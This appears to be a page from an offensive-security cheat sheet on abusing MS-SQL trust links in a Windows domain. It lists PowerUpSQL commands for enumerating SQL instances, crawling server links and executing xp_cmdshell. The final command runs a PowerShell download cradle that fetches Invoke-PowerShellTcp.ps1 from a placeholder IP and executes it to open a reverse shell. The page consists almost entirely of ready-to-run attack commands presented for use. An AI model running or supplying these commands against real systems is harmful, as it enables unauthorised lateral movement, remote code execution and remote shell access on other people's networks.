ABUSING MS-SQL TRUST

Enumerate instances of MS-SQL in current domain where attacker has read privilege

Get-SQLInstanceDomain

To get detailed information of MS-SQL instances in current domain where attacker has read privilege

Get-SQLInstanceDomain | Get-SQLServerInfo

To get all chain links of MS-SQL instances in current domain where attacker has read privilege

Get-SQLInstanceDomain | Get-SQLServerLink

To get chain links of specific MS-SQL instance

Get-SQLServerLink -Instance <MS-SQL INSTANCE>

To crawl the chain link from specific MS-SQL instance

Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE>

To execute any SQL query while crawling MS-SQL instances

Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "<QUERY>"

To execute "whoami" query while crawling MS-SQL instances

Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query "exec master..xp_cmdshell 'whoami'"

To trigger a reverse shell while crawling MS-SQL instances where command execution is possible

Get-SQLServerLinkCrawl -Instance <MS-SQL INSTANCE> -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http:// <IP>/Invoke-PowerShellTcp.ps1'')"'

PreviousTRUST BASED DOMAIN ATTACKS NextWINDOWS LOCAL PRIVILEGE ESCALATION

Last updated 3 years ago